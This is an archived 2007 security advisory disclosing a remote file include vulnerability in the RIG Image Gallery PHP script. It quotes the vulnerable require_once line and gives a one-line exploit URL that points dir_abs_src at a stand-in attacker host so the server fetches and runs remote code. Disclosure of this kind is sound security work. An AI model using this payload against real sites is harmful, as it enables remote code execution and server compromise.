RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability Jul 30 2007 07:09PM
ilkerkandemir mynet com
------------------------------------------------------------------------
-------------------------------------------

MEFISTO PreSents...

Script: RIG Image Gallery
Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));

------------------------------------------------------------------------
-------------------------------------------

Exploit: check_entry.php?dir_abs_src=http://attacker.php?

------------------------------------------------------------------------
-------------------------------------------

Tnx:H0tturk,Ajann,Dumenci,Str0ke

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus